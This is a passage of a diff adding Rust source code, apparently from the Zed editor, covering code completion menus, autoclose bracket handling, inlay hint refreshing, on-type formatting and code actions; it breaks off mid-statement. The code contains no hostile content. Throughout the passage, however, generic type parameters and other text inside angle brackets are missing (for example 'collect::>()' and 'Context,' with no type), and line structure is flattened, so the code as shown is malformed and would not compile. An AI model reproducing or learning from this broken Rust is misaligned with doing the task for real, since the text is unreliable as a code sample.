+ let selection_anchors = this.buffer.update(cx, |buffer, cx| { + let anchors = { + let snapshot = buffer.read(cx); + old_selections + .iter() + .map(|s| { + let anchor = snapshot.anchor_after(s.head()); + s.map(|_| anchor) + }) + .collect::>() + }; + buffer.edit( + old_selections + .iter() + .map(|s| (s.start..s.end, text.clone())), + autoindent_mode, + cx, + ); + anchors + }); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_anchors(selection_anchors); + }); + + cx.notify(); + }); + } + + fn trigger_completion_on_input( + &mut self, + text: &str, + trigger_in_words: bool, + window: &mut Window, + cx: &mut Context, + ) { + let ignore_completion_provider = self + .context_menu + .borrow() + .as_ref() + .map(|menu| match menu { + CodeContextMenu::Completions(completions_menu) => { + completions_menu.ignore_completion_provider + } + CodeContextMenu::CodeActions(_) => false, + }) + .unwrap_or(false); + + if ignore_completion_provider { + self.show_word_completions(&ShowWordCompletions, window, cx); + } else if self.is_completion_trigger(text, trigger_in_words, cx) { + self.show_completions( + &ShowCompletions { + trigger: Some(text.to_owned()).filter(|x| !x.is_empty()), + }, + window, + cx, + ); + } else { + self.hide_context_menu(window, cx); + } + } + + fn is_completion_trigger( + &self, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool { + let position = self.selections.newest_anchor().head(); + let multibuffer = self.buffer.read(cx); + let Some(buffer) = position + .buffer_id + .and_then(|buffer_id| multibuffer.buffer(buffer_id).clone()) + else { + return false; + }; + + if let Some(completion_provider) = &self.completion_provider { + completion_provider.is_completion_trigger( + &buffer, + position.text_anchor, + text, + trigger_in_words, + cx, + ) + } else { + false + } + } + + /// If any empty selections is touching the start of its innermost containing autoclose + /// region, expand it to select the brackets. + fn select_autoclose_pair(&mut self, window: &mut Window, cx: &mut Context) { + let selections = self.selections.all::(cx); + let buffer = self.buffer.read(cx).read(cx); + let new_selections = self + .selections_with_autoclose_regions(selections, &buffer) + .map(|(mut selection, region)| { + if !selection.is_empty() { + return selection; + } + + if let Some(region) = region { + let mut range = region.range.to_offset(&buffer); + if selection.start == range.start && range.start >= region.pair.start.len() { + range.start -= region.pair.start.len(); + if buffer.contains_str_at(range.start, ®ion.pair.start) + && buffer.contains_str_at(range.end, ®ion.pair.end) + { + range.end += region.pair.end.len(); + selection.start = range.start; + selection.end = range.end; + + return selection; + } + } + } + + let always_treat_brackets_as_autoclosed = buffer + .language_settings_at(selection.start, cx) + .always_treat_brackets_as_autoclosed; + + if !always_treat_brackets_as_autoclosed { + return selection; + } + + if let Some(scope) = buffer.language_scope_at(selection.start) { + for (pair, enabled) in scope.brackets() { + if !enabled || !pair.close { + continue; + } + + if buffer.contains_str_at(selection.start, &pair.end) { + let pair_start_len = pair.start.len(); + if buffer.contains_str_at( + selection.start.saturating_sub(pair_start_len), + &pair.start, + ) { + selection.start -= pair_start_len; + selection.end += pair.end.len(); + + return selection; + } + } + } + } + + selection + }) + .collect(); + + drop(buffer); + self.change_selections(None, window, cx, |selections| { + selections.select(new_selections) + }); + } + + /// Iterate the given selections, and for each one, find the smallest surrounding + /// autoclose region. This uses the ordering of the selections and the autoclose + /// regions to avoid repeated comparisons. + fn selections_with_autoclose_regions<'a, D: ToOffset + Clone>( + &'a self, + selections: impl IntoIterator>, + buffer: &'a MultiBufferSnapshot, + ) -> impl Iterator, Option<&'a AutocloseRegion>)> { + let mut i = 0; + let mut regions = self.autoclose_regions.as_slice(); + selections.into_iter().map(move |selection| { + let range = selection.start.to_offset(buffer)..selection.end.to_offset(buffer); + + let mut enclosing = None; + while let Some(pair_state) = regions.get(i) { + if pair_state.range.end.to_offset(buffer) < range.start { + regions = ®ions[i + 1..]; + i = 0; + } else if pair_state.range.start.to_offset(buffer) > range.end { + break; + } else { + if pair_state.selection_id == selection.id { + enclosing = Some(pair_state); + } + i += 1; + } + } + + (selection, enclosing) + }) + } + + /// Remove any autoclose regions that no longer contain their selection. + fn invalidate_autoclose_regions( + &mut self, + mut selections: &[Selection], + buffer: &MultiBufferSnapshot, + ) { + self.autoclose_regions.retain(|state| { + let mut i = 0; + while let Some(selection) = selections.get(i) { + if selection.end.cmp(&state.range.start, buffer).is_lt() { + selections = &selections[1..]; + continue; + } + if selection.start.cmp(&state.range.end, buffer).is_gt() { + break; + } + if selection.id == state.selection_id { + return true; + } else { + i += 1; + } + } + false + }); + } + + fn completion_query(buffer: &MultiBufferSnapshot, position: impl ToOffset) -> Option { + let offset = position.to_offset(buffer); + let (word_range, kind) = buffer.surrounding_word(offset, true); + if offset > word_range.start && kind == Some(CharKind::Word) { + Some( + buffer + .text_for_range(word_range.start..offset) + .collect::(), + ) + } else { + None + } + } + + pub fn toggle_inline_values( + &mut self, + _: &ToggleInlineValues, + _: &mut Window, + cx: &mut Context, + ) { + self.inline_value_cache.enabled = !self.inline_value_cache.enabled; + + self.refresh_inline_values(cx); + } + + pub fn toggle_inlay_hints( + &mut self, + _: &ToggleInlayHints, + _: &mut Window, + cx: &mut Context, + ) { + self.refresh_inlay_hints( + InlayHintRefreshReason::Toggle(!self.inlay_hints_enabled()), + cx, + ); + } + + pub fn inlay_hints_enabled(&self) -> bool { + self.inlay_hint_cache.enabled + } + + pub fn inline_values_enabled(&self) -> bool { + self.inline_value_cache.enabled + } + + fn refresh_inlay_hints(&mut self, reason: InlayHintRefreshReason, cx: &mut Context) { + if self.semantics_provider.is_none() || !self.mode.is_full() { + return; + } + + let reason_description = reason.description(); + let ignore_debounce = matches!( + reason, + InlayHintRefreshReason::SettingsChange(_) + | InlayHintRefreshReason::Toggle(_) + | InlayHintRefreshReason::ExcerptsRemoved(_) + | InlayHintRefreshReason::ModifiersChanged(_) + ); + let (invalidate_cache, required_languages) = match reason { + InlayHintRefreshReason::ModifiersChanged(enabled) => { + match self.inlay_hint_cache.modifiers_override(enabled) { + Some(enabled) => { + if enabled { + (InvalidationStrategy::RefreshRequested, None) + } else { + self.splice_inlays( + &self + .visible_inlay_hints(cx) + .iter() + .map(|inlay| inlay.id) + .collect::>(), + Vec::new(), + cx, + ); + return; + } + } + None => return, + } + } + InlayHintRefreshReason::Toggle(enabled) => { + if self.inlay_hint_cache.toggle(enabled) { + if enabled { + (InvalidationStrategy::RefreshRequested, None) + } else { + self.splice_inlays( + &self + .visible_inlay_hints(cx) + .iter() + .map(|inlay| inlay.id) + .collect::>(), + Vec::new(), + cx, + ); + return; + } + } else { + return; + } + } + InlayHintRefreshReason::SettingsChange(new_settings) => { + match self.inlay_hint_cache.update_settings( + &self.buffer, + new_settings, + self.visible_inlay_hints(cx), + cx, + ) { + ControlFlow::Break(Some(InlaySplice { + to_remove, + to_insert, + })) => { + self.splice_inlays(&to_remove, to_insert, cx); + return; + } + ControlFlow::Break(None) => return, + ControlFlow::Continue(()) => (InvalidationStrategy::RefreshRequested, None), + } + } + InlayHintRefreshReason::ExcerptsRemoved(excerpts_removed) => { + if let Some(InlaySplice { + to_remove, + to_insert, + }) = self.inlay_hint_cache.remove_excerpts(&excerpts_removed) + { + self.splice_inlays(&to_remove, to_insert, cx); + } + self.display_map.update(cx, |display_map, _| { + display_map.remove_inlays_for_excerpts(&excerpts_removed) + }); + return; + } + InlayHintRefreshReason::NewLinesShown => (InvalidationStrategy::None, None), + InlayHintRefreshReason::BufferEdited(buffer_languages) => { + (InvalidationStrategy::BufferEdited, Some(buffer_languages)) + } + InlayHintRefreshReason::RefreshRequested => { + (InvalidationStrategy::RefreshRequested, None) + } + }; + + if let Some(InlaySplice { + to_remove, + to_insert, + }) = self.inlay_hint_cache.spawn_hint_refresh( + reason_description, + self.excerpts_for_inlay_hints_query(required_languages.as_ref(), cx), + invalidate_cache, + ignore_debounce, + cx, + ) { + self.splice_inlays(&to_remove, to_insert, cx); + } + } + + fn visible_inlay_hints(&self, cx: &Context) -> Vec { + self.display_map + .read(cx) + .current_inlays() + .filter(move |inlay| matches!(inlay.id, InlayId::Hint(_))) + .cloned() + .collect() + } + + pub fn excerpts_for_inlay_hints_query( + &self, + restrict_to_languages: Option<&HashSet>>, + cx: &mut Context, + ) -> HashMap, clock::Global, Range)> { + let Some(project) = self.project.as_ref() else { + return HashMap::default(); + }; + let project = project.read(cx); + let multi_buffer = self.buffer().read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let multi_buffer_visible_start = self + .scroll_manager + .anchor() + .anchor + .to_point(&multi_buffer_snapshot); + let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( + multi_buffer_visible_start + + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), + Bias::Left, + ); + let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; + multi_buffer_snapshot + .range_to_buffer_ranges(multi_buffer_visible_range) + .into_iter() + .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()) + .filter_map(|(buffer, excerpt_visible_range, excerpt_id)| { + let buffer_file = project::File::from_dyn(buffer.file())?; + let buffer_worktree = project.worktree_for_id(buffer_file.worktree_id(cx), cx)?; + let worktree_entry = buffer_worktree + .read(cx) + .entry_for_id(buffer_file.project_entry_id(cx)?)?; + if worktree_entry.is_ignored { + return None; + } + + let language = buffer.language()?; + if let Some(restrict_to_languages) = restrict_to_languages { + if !restrict_to_languages.contains(language) { + return None; + } + } + Some(( + excerpt_id, + ( + multi_buffer.buffer(buffer.remote_id()).unwrap(), + buffer.version().clone(), + excerpt_visible_range, + ), + )) + }) + .collect() + } + + pub fn text_layout_details(&self, window: &mut Window) -> TextLayoutDetails { + TextLayoutDetails { + text_system: window.text_system().clone(), + editor_style: self.style.clone().unwrap(), + rem_size: window.rem_size(), + scroll_anchor: self.scroll_manager.anchor(), + visible_rows: self.visible_line_count(), + vertical_scroll_margin: self.scroll_manager.vertical_scroll_margin, + } + } + + pub fn splice_inlays( + &self, + to_remove: &[InlayId], + to_insert: Vec, + cx: &mut Context, + ) { + self.display_map.update(cx, |display_map, cx| { + display_map.splice_inlays(to_remove, to_insert, cx) + }); + cx.notify(); + } + + fn trigger_on_type_formatting( + &self, + input: String, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + if input.len() != 1 { + return None; + } + + let project = self.project.as_ref()?; + let position = self.selections.newest_anchor().head(); + let (buffer, buffer_position) = self + .buffer + .read(cx) + .text_anchor_for_position(position, cx)?; + + let settings = language_settings::language_settings( + buffer + .read(cx) + .language_at(buffer_position) + .map(|l| l.name()), + buffer.read(cx).file(), + cx, + ); + if !settings.use_on_type_format { + return None; + } + + // OnTypeFormatting returns a list of edits, no need to pass them between Zed instances, + // hence we do LSP request & edit on host side only — add formats to host's history. + let push_to_lsp_host_history = true; + // If this is not the host, append its history with new edits. + let push_to_client_history = project.read(cx).is_via_collab(); + + let on_type_formatting = project.update(cx, |project, cx| { + project.on_type_format( + buffer.clone(), + buffer_position, + input, + push_to_lsp_host_history, + cx, + ) + }); + Some(cx.spawn_in(window, async move |editor, cx| { + if let Some(transaction) = on_type_formatting.await? { + if push_to_client_history { + buffer + .update(cx, |buffer, _| { + buffer.push_transaction(transaction, Instant::now()); + buffer.finalize_last_transaction(); + }) + .ok(); + } + editor.update(cx, |editor, cx| { + editor.refresh_document_highlights(cx); + })?; + } + Ok(()) + })) + } + + pub fn show_word_completions( + &mut self, + _: &ShowWordCompletions, + window: &mut Window, + cx: &mut Context, + ) { + self.open_completions_menu(true, None, window, cx); + } + + pub fn show_completions( + &mut self, + options: &ShowCompletions, + window: &mut Window, + cx: &mut Context, + ) { + self.open_completions_menu(false, options.trigger.as_deref(), window, cx); + } + + fn open_completions_menu( + &mut self, + ignore_completion_provider: bool, + trigger: Option<&str>, + window: &mut Window, + cx: &mut Context, + ) { + if self.pending_rename.is_some() { + return; + } + if !self.snippet_stack.is_empty() && self.context_menu.borrow().as_ref().is_some() { + return; + } + + let position = self.selections.newest_anchor().head(); + if position.diff_base_anchor.is_some() { + return; + } + let (buffer, buffer_position) = + if let Some(output) = self.buffer.read(cx).text_anchor_for_position(position, cx) { + output + } else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let show_completion_documentation = buffer_snapshot + .settings_at(buffer_position, cx) + .show_completion_documentation; + + let query = Self::completion_query(&self.buffer.read(cx).read(cx), position); + + let trigger_kind = match trigger { + Some(trigger) if buffer.read(cx).completion_triggers().contains(trigger) => { + CompletionTriggerKind::TRIGGER_CHARACTER + } + _ => CompletionTriggerKind::INVOKED, + }; + let completion_context = CompletionContext { + trigger_character: trigger.and_then(|trigger| { + if trigger_kind == CompletionTriggerKind::TRIGGER_CHARACTER { + Some(String::from(trigger)) + } else { + None + } + }), + trigger_kind, + }; + + let (old_range, word_kind) = buffer_snapshot.surrounding_word(buffer_position); + let (old_range, word_to_exclude) = if word_kind == Some(CharKind::Word) { + let word_to_exclude = buffer_snapshot + .text_for_range(old_range.clone()) + .collect::(); + ( + buffer_snapshot.anchor_before(old_range.start) + ..buffer_snapshot.anchor_after(old_range.end), + Some(word_to_exclude), + ) + } else { + (buffer_position..buffer_position, None) + }; + + let completion_settings = language_settings( + buffer_snapshot + .language_at(buffer_position) + .map(|language| language.name()), + buffer_snapshot.file(), + cx, + ) + .completions; + + // The document can be large, so stay in reasonable bounds when searching for words, + // otherwise completion pop-up might be slow to appear. + const WORD_LOOKUP_ROWS: u32 = 5_000; + let buffer_row = text::ToPoint::to_point(&buffer_position, &buffer_snapshot).row; + let min_word_search = buffer_snapshot.clip_point( + Point::new(buffer_row.saturating_sub(WORD_LOOKUP_ROWS), 0), + Bias::Left, + ); + let max_word_search = buffer_snapshot.clip_point( + Point::new(buffer_row + WORD_LOOKUP_ROWS, 0).min(buffer_snapshot.max_point()), + Bias::Right, + ); + let word_search_range = buffer_snapshot.point_to_offset(min_word_search) + ..buffer_snapshot.point_to_offset(max_word_search); + + let provider = self + .completion_provider + .as_ref() + .filter(|_| !ignore_completion_provider); + let skip_digits = query + .as_ref() + .map_or(true, |query| !query.chars().any(|c| c.is_digit(10))); + + let (mut words, provided_completions) = match provider { + Some(provider) => { + let completions = provider.completions( + position.excerpt_id, + &buffer, + buffer_position, + completion_context, + window, + cx, + ); + + let words = match completion_settings.words { + WordsCompletionMode::Disabled => Task::ready(BTreeMap::default()), + WordsCompletionMode::Enabled | WordsCompletionMode::Fallback => cx + .background_spawn(async move { + buffer_snapshot.words_in_range(WordsQuery { + fuzzy_contents: None, + range: word_search_range, + skip_digits, + }) + }), + }; + + (words, completions) + } + None => ( + cx.background_spawn(async move { + buffer_snapshot.words_in_range(WordsQuery { + fuzzy_contents: None, + range: word_search_range, + skip_digits, + }) + }), + Task::ready(Ok(None)), + ), + }; + + let sort_completions = provider + .as_ref() + .map_or(false, |provider| provider.sort_completions()); + + let filter_completions = provider + .as_ref() + .map_or(true, |provider| provider.filter_completions()); + + let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; + + let id = post_inc(&mut self.next_completion_id); + let task = cx.spawn_in(window, async move |editor, cx| { + async move { + editor.update(cx, |this, _| { + this.completion_tasks.retain(|(task_id, _)| *task_id >= id); + })?; + + let mut completions = Vec::new(); + if let Some(provided_completions) = provided_completions.await.log_err().flatten() { + completions.extend(provided_completions); + if completion_settings.words == WordsCompletionMode::Fallback { + words = Task::ready(BTreeMap::default()); + } + } + + let mut words = words.await; + if let Some(word_to_exclude) = &word_to_exclude { + words.remove(word_to_exclude); + } + for lsp_completion in &completions { + words.remove(&lsp_completion.new_text); + } + completions.extend(words.into_iter().map(|(word, word_range)| Completion { + replace_range: old_range.clone(), + new_text: word.clone(), + label: CodeLabel::plain(word, None), + icon_path: None, + documentation: None, + source: CompletionSource::BufferWord { + word_range, + resolved: false, + }, + insert_text_mode: Some(InsertTextMode::AS_IS), + confirm: None, + })); + + let menu = if completions.is_empty() { + None + } else { + let mut menu = CompletionsMenu::new( + id, + sort_completions, + show_completion_documentation, + ignore_completion_provider, + position, + buffer.clone(), + completions.into(), + snippet_sort_order, + ); + + menu.filter( + if filter_completions { + query.as_deref() + } else { + None + }, + cx.background_executor().clone(), + ) + .await; + + menu.visible().then_some(menu) + }; + + editor.update_in(cx, |editor, window, cx| { + match editor.context_menu.borrow().as_ref() { + None => {} + Some(CodeContextMenu::Completions(prev_menu)) => { + if prev_menu.id > id { + return; + } + } + _ => return, + } + + if editor.focus_handle.is_focused(window) && menu.is_some() { + let mut menu = menu.unwrap(); + menu.resolve_visible_completions(editor.completion_provider.as_deref(), cx); + + *editor.context_menu.borrow_mut() = + Some(CodeContextMenu::Completions(menu)); + + if editor.show_edit_predictions_in_menu() { + editor.update_visible_inline_completion(window, cx); + } else { + editor.discard_inline_completion(false, cx); + } + + cx.notify(); + } else if editor.completion_tasks.len() <= 1 { + // If there are no more completion tasks and the last menu was + // empty, we should hide it. + let was_hidden = editor.hide_context_menu(window, cx).is_none(); + // If it was already hidden and we don't show inline + // completions in the menu, we should also show the + // inline-completion when available. + if was_hidden && editor.show_edit_predictions_in_menu() { + editor.update_visible_inline_completion(window, cx); + } + } + })?; + + anyhow::Ok(()) + } + .log_err() + .await + }); + + self.completion_tasks.push((id, task)); + } + + #[cfg(feature = "test-support")] + pub fn current_completions(&self) -> Option> { + let menu = self.context_menu.borrow(); + if let CodeContextMenu::Completions(menu) = menu.as_ref()? { + let completions = menu.completions.borrow(); + Some(completions.to_vec()) + } else { + None + } + } + + pub fn confirm_completion( + &mut self, + action: &ConfirmCompletion, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) + } + + pub fn confirm_completion_insert( + &mut self, + _: &ConfirmCompletionInsert, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) + } + + pub fn confirm_completion_replace( + &mut self, + _: &ConfirmCompletionReplace, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) + } + + pub fn compose_completion( + &mut self, + action: &ComposeCompletion, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) + } + + fn do_completion( + &mut self, + item_ix: Option, + intent: CompletionIntent, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + use language::ToOffset as _; + + let CodeContextMenu::Completions(completions_menu) = self.hide_context_menu(window, cx)? + else { + return None; + }; + + let candidate_id = { + let entries = completions_menu.entries.borrow(); + let mat = entries.get(item_ix.unwrap_or(completions_menu.selected_item))?; + if self.show_edit_predictions_in_menu() { + self.discard_inline_completion(true, cx); + } + mat.candidate_id + }; + + let buffer_handle = completions_menu.buffer; + let completion = completions_menu + .completions + .borrow() + .get(candidate_id)? + .clone(); + cx.stop_propagation(); + + let snippet; + let new_text; + if completion.is_snippet() { + snippet = Some(Snippet::parse(&completion.new_text).log_err()?); + new_text = snippet.as_ref().unwrap().text.clone(); + } else { + snippet = None; + new_text = completion.new_text.clone(); + }; + + let replace_range = choose_completion_range(&completion, intent, &buffer_handle, cx); + let buffer = buffer_handle.read(cx); + let snapshot = self.buffer.read(cx).snapshot(cx); + let replace_range_multibuffer = { + let excerpt = snapshot + .excerpt_containing(self.selections.newest_anchor().range()) + .unwrap(); + let multibuffer_anchor = snapshot + .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.start)) + .unwrap() + ..snapshot + .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.end)) + .unwrap(); + multibuffer_anchor.start.to_offset(&snapshot) + ..multibuffer_anchor.end.to_offset(&snapshot) + }; + let newest_anchor = self.selections.newest_anchor(); + if newest_anchor.head().buffer_id != Some(buffer.remote_id()) { + return None; + } + + let old_text = buffer + .text_for_range(replace_range.clone()) + .collect::(); + let lookbehind = newest_anchor + .start + .text_anchor + .to_offset(buffer) + .saturating_sub(replace_range.start); + let lookahead = replace_range + .end + .saturating_sub(newest_anchor.end.text_anchor.to_offset(buffer)); + let prefix = &old_text[..old_text.len().saturating_sub(lookahead)]; + let suffix = &old_text[lookbehind.min(old_text.len())..]; + + let selections = self.selections.all::(cx); + let mut ranges = Vec::new(); + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + + for selection in &selections { + let range = if selection.id == newest_anchor.id { + replace_range_multibuffer.clone() + } else { + let mut range = selection.range(); + + // if prefix is present, don't duplicate it + if snapshot.contains_str_at(range.start.saturating_sub(lookbehind), prefix) { + range.start = range.start.saturating_sub(lookbehind); + + // if suffix is also present, mimic the newest cursor and replace it + if selection.id != newest_anchor.id + && snapshot.contains_str_at(range.end, suffix) + { + range.end += lookahead; + } + } + range + }; + + ranges.push(range); + + if !self.linked_edit_ranges.is_empty() { + let start_anchor = snapshot.anchor_before(selection.head()); + let end_anchor = snapshot.anchor_after(selection.tail()); + if let Some(ranges) = self + .linked_editing_ranges_for(start_anchor.text_anchor..end_anchor.text_anchor, cx) + { + for (buffer, edits) in ranges { + linked_edits + .entry(buffer.clone()) + .or_default() + .extend(edits.into_iter().map(|range| (range, new_text.to_owned()))); + } + } + } + } + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: None, + text: new_text.clone().into(), + }); + + self.transact(window, cx, |this, window, cx| { + if let Some(mut snippet) = snippet { + snippet.text = new_text.to_string(); + this.insert_snippet(&ranges, snippet, window, cx).log_err(); + } else { + this.buffer.update(cx, |buffer, cx| { + let auto_indent = match completion.insert_text_mode { + Some(InsertTextMode::AS_IS) => None, + _ => this.autoindent_mode.clone(), + }; + let edits = ranges.into_iter().map(|range| (range, new_text.as_str())); + buffer.edit(edits, auto_indent, cx); + }); + } + for (buffer, edits) in linked_edits { + buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(); + let edits = edits + .into_iter() + .map(|(range, text)| { + use text::ToPoint as TP; + let end_point = TP::to_point(&range.end, &snapshot); + let start_point = TP::to_point(&range.start, &snapshot); + (start_point..end_point, text) + }) + .sorted_by_key(|(range, _)| range.start); + buffer.edit(edits, None, cx); + }) + } + + this.refresh_inline_completion(true, false, window, cx); + }); + + let show_new_completions_on_confirm = completion + .confirm + .as_ref() + .map_or(false, |confirm| confirm(intent, window, cx)); + if show_new_completions_on_confirm { + self.show_completions(&ShowCompletions { trigger: None }, window, cx); + } + + let provider = self.completion_provider.as_ref()?; + drop(completion); + let apply_edits = provider.apply_additional_edits_for_completion( + buffer_handle, + completions_menu.completions.clone(), + candidate_id, + true, + cx, + ); + + let editor_settings = EditorSettings::get_global(cx); + if editor_settings.show_signature_help_after_edits || editor_settings.auto_signature_help { + // After the code completion is finished, users often want to know what signatures are needed. + // so we should automatically call signature_help + self.show_signature_help(&ShowSignatureHelp, window, cx); + } + + Some(cx.foreground_executor().spawn(async move { + apply_edits.await?; + Ok(()) + })) + } + + pub fn toggle_code_actions( + &mut self, + action: &ToggleCodeActions, + window: &mut Window, + cx: &mut Context, + ) { + let quick_launch = action.quick_launch; + let mut context_menu = self.context_menu.borrow_mut(); + if let Some(CodeContextMenu::CodeActions(code_actions)) = context_menu.as_ref() { + if code_actions.deployed_from_indicator == action.deployed_from_indicator { + // Toggle if we're selecting the same one + *context_menu = None; + cx.notify(); + return; + } else { + // Otherwise, clear it and start a new one + *context_menu = None; + cx.notify(); + } + } + drop(context_menu); + let snapshot = self.snapshot(window, cx); + let deployed_from_indicator = action.deployed_from_indicator; + let mut task = self.code_actions_task.take(); + let action = action.clone(); + cx.spawn_in(window, async move |editor, cx| { + while let Some(prev_task) = task { + prev_task.await.log_err(); + task = editor.update(cx, |this, _| this.code_actions_task.take())?; + } + + let spawned_test_task = editor.update_in(cx, |editor, window, cx| { + if editor.focus_handle.is_focused(window) { + let multibuffer_point = action + .deployed_from_indicator + .map(|row| DisplayPoint::new(row, 0).to_point(&snapshot)) + .unwrap_or_else(|| editor.selections.newest::(cx).head()); + let (buffer, buffer_row) = snapshot + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(multibuffer_point.row)) + .and_then(|(buffer_snapshot, range)| { + editor + .buffer + .read(cx) + .buffer(buffer_snapshot.remote_id()) + .map(|buffer| (buffer, range.start.row)) + })?; + let (_, code_actions) = editor + .available_code_actions + .clone() + .and_then(|(location, code_actions)| { + let snapshot = location.buffer.read(cx).snapshot(); + let point_range = location.range.to_point(&snapshot); + let point_range = point_range.start.row..=point_range.end.row; + if point_range.contains(&buffer_row) { + Some((location, code_actions)) + } else { + None + } + }) + .unzip(); + let buffer_id = buffer.read(cx).remote_id(); + let tasks = editor + .tasks + .get(&(buffer_id, buffer_row)) + .map(|t| Arc::new(t.to_owned())); + if tasks.is_none() && code_actions.is_none() { + return None; + } + + editor.completion_tasks.clear(); + editor.discard_inline_completion(false, cx); + let task_context = + tasks + .as_ref() + .zip(editor.project.clone()) + .map(|(tasks, project)| { + Self::build_tasks_context(&project, &buffer, buffer_row, tasks, cx) + }); + + Some(cx.spawn_in(window, async move |editor, cx| { + let task_context = match task_context { + Some(task_context) => task_context.await, + None => None, + }; + let resolved_tasks = + tasks + .zip(task_context.clone()) + .map(|(tasks, task_context)| ResolvedTasks { + templates: tasks.resolve(&task_context).collect(), + position: snapshot.buffer_snapshot.anchor_before(Point::new( + multibuffer_point.row, + tasks.column, + )), + }); + let spawn_straight_away = quick_launch + && resolved_tasks + .as_ref() + .map_or(false, |tasks| tasks.templates.len() == 1) + && code_actions + .as_ref() + .map_or(true, |actions| actions.is_empty()); + let debug_scenarios = editor.update(cx, |editor, cx| { + if cx.has_flag::() { + maybe!({ + let project = editor.project.as_ref()?; + let dap_store = project.read(cx).dap_store(); + let mut scenarios = vec![]; + let resolved_tasks = resolved_tasks.as_ref()?; + let debug_adapter: SharedString = buffer + .read(cx) + .language()? + .context_provider()? + .debug_adapter()? + .into(); + dap_store.update(cx, |this, cx| { + for (_, task) in &resolved_tasks.templates { + if let Some(scenario) = this + .debug_scenario_for_build_task( + task.resolved.clone(), + SharedString::from( + task.original_task().label.clone(), + ), + debug_adapter.clone(), + cx, + ) + { + scenarios.push(scenario); + } + } + }); + Some(scenarios) + }) + .unwrap_or_default() + } else { + vec![] + } + })?; + if let Ok(task) = editor.update_in(cx, |editor, window, cx| { + *editor.context_menu.borrow_mut() = + Some(CodeContextMenu::CodeActions(CodeActionsMenu { + buffer, + actions: CodeActionContents::new( + resolved_tasks, + code_actions, + debug_scenarios, + task_context.unwrap_or_default(), + ), + selected_item: Default::default(), + scroll_handle: UniformListScrollHandle::default(), + deployed_from_indicator, + })); + if spawn_straight_away { + if let Some(task) = editor.confirm_code_action( + &ConfirmCodeAction { item_ix: Some(0) }, + window, + cx, + ) { + cx.notify(); + return task; + } + } + cx.notify(); + Task::ready(Ok(())) + }) { + task.await + } else { + Ok(()) + } + })) + } else { + Some(Task::ready(Ok(()))) + } + })?; + if let Some(task) = spawned_test_task { + task.await?; + } + + anyhow::Ok(()) + }) + .detach_and_log_err(cx); + } + + pub fn confirm_code_action( + &mut self, + action: &ConfirmCodeAction, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let actions_menu = + if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? { + menu + } else { + return None; + }; + + let action_ix = action.item_ix.unwrap_or(actions_menu.selected_item); + let action = actions_menu.actions.get(action_ix)?; + let title = action.label(); + let buffer = actions_menu.buffer; + let workspace = self.workspace()?; + + match action { + CodeActionsItem::Task(task_source_kind, resolved_task) => { + workspace.update(cx, |workspace, cx| { + workspace.schedule_resolved_task( + task_source_kind, + resolved_task, + false, + window, + cx, + ); + + Some(Task::ready(Ok(()))) + }) + } + CodeActionsItem::CodeAction { + excerpt_id, + action, + provider, + } => { + let apply_code_action = + provider.apply_code_action(buffer, action, excerpt_id, true, window, cx); + let workspace = workspace.downgrade(); + Some(cx.spawn_in(window, async move |editor, cx| { + let project_transaction = apply_code_action.await?; + Self::open_project_transaction( + &editor, + workspace, + project_transaction, + title, + cx, + ) + .await + })) + } + CodeActionsItem::DebugScenario(scenario) => { + let context = actions_menu.actions.context.clone(); + + workspace.update(cx, |workspace, cx| { + workspace.start_debug_session(scenario, context, Some(buffer), window, cx); + }); + Some(Task::ready(Ok(()))) + } + } + } + + pub async fn open_project_transaction( + this: &WeakEntity, + workspace: WeakEntity, + transaction: ProjectTransaction, + title: String, + cx: &mut AsyncWindowContext, + ) -> Result<()> { + let mut entries = transaction.0.into_iter().collect::>(); + cx.update(|_, cx| { + entries.sort_unstable_by_key(|(buffer, _)| { + buffer.read(cx).file().map(|f| f.path().clone()) + }); + })?; + + // If the project transaction's edits are all contained within this editor, then + // avoid opening a new editor to display them. + + if let Some((buffer, transaction)) = entries.first() { + if entries.len() == 1 { + let excerpt = this.update(cx, |editor, cx| { + editor + .buffer() + .read(cx) + .excerpt_containing(editor.selections.newest_anchor().head(), cx) + })?; + if let Some((_, excerpted_buffer, excerpt_range)) = excerpt { + if excerpted_buffer == *buffer { + let all_edits_within_excerpt = buffer.read_with(cx, |buffer, _| { + let excerpt_range = excerpt_range.to_offset(buffer); + buffer + .edited_ranges_for_transaction::(transaction) + .all(|range| { + excerpt_range.start <= range.start + && excerpt_range.end >= range.end + }) + })?; + + if all_edits_within_excerpt { + return Ok(()); + } + } + } + } + } else { + return Ok(()); + } + + let mut ranges_to_highlight = Vec::new(); + let excerpt_buffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite).with_title(title); + for (buffer_handle, transaction) in &entries { + let edited_ranges = buffer_handle + .read(cx) + 